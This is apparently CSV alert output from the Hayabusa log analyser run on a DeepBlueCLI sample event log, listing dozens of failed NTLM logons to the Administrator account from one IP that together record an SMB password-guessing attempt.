+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: atDwGfxC4RLYYDAF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.195 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fCTUmKwLxkKCoCTn | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DBE7Y8yJMNSkJlaK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N7VGVfH05BC7bgaZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lP7kC2ayRIEeL5sw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2cQOn41cB2t0ZkSP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.398 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PpOyXZwlcCw63tWP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.445 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 7R8yD7A0lCU16Z0t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.481 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: frasd7f8On0O7B6k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.529 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FtOqqV6rkCIZPPFG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lnwn4dc1lKABRKxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CiUnLFzfXR6rER9B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u1InESrL0ebaRw2z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:51:52.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IlLAG8gXt9YNeW4H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.757 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uZIWubLvZcDOWHxr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FZazp7ZnBrtswAse | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.849 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jqK5Vqf0QF4qtg0A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k3JvFwi9gDNbO6Sj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fBubAOTZMsahNG0Q | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:52.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KCxrXG3N1IRzDxxM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e2h9M7o0lS7oC00a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.074 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pprfGGVZblL64xC3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wxgzMKd7eDwzs8WO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q2RljqAhn0NZhR6O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: rcxQVtjMqnE1wGfr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.321 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fSRggYsSiJGsGSyV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yQqfSKOyKLSILPrQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k7oAI2q6YCu8btlK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KniVwndqE9aC6cIM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:53.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FgQbvpfuS11matJi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:51:53.702 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R9TwJS4B9ZaDD2Ze | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IPUuoopOnwlTjlTP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.806 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9VEyOUuiOi8Q3JBJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.862 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pGGGazMTBBfrppDZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.919 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NKO4V35Y2qPEB59W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WxVdhpR7ZnAluurU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gZjAZb9bQKZjwL8u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.066 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aKyLX5ChpgBuFEbr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.112 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 49t2xJvH2yHcyHle | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sg9Z6Pyix2UkMolr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.210 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0NN2olYn97ZoYCja | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.249 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S98j54bDGsz0k6g9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XxFEw9s0nnEQGzUN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.342 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wSswFHFSlqcQd47k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7icutlVIWSLZJszQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.440 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DSwyugYn0n3i5f25 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RmBaLCUcR7TmixTy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1oOBz2NQSCdTwa7V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O4tU1LPF5DRW9Vm0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.633 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SRsSNqPYruWBzp2n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3JZhBLzt4af1VtCU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.729 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dFLZIKSDBvBaWq59 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: guAG4ZTFMjZAxp1A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yd04xsSIdiczICeG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.865 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cx3i1URKPhC6KWI7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.914 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Npc6IS27HsWP3JA9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:54.963 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KIBnr0eZ1bHHGokW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.013 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6gTTrUVjpPU80LlC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.078 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FZlmUbCNAJga24JH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zf3aSGBMe97VujaH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8bx7ZM77aDG7y6Lh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BnHHAClMwyqA3TTI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 00ibRrYvnFt5w9X0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VglTKbnLVFvHZHzQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.358 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3NwX0sDFwHQG7Tkq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.413 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3mMx3M1zurKMBzyj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sH7b8P0O0uea3PlN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.530 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJcrTyBPuX0TcvOT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.574 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kwuZIQAL3BmJnPsJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lxgAfsnH6YWLRD0a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ttBOjzmEBjr9W2QW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FPDKGGYkJQeWgtUf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nSoJWqS6YPbpCiBf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.887 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pr2oMzxv7pcDfsgw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:55.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jiopmZAMpwg3dEaA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
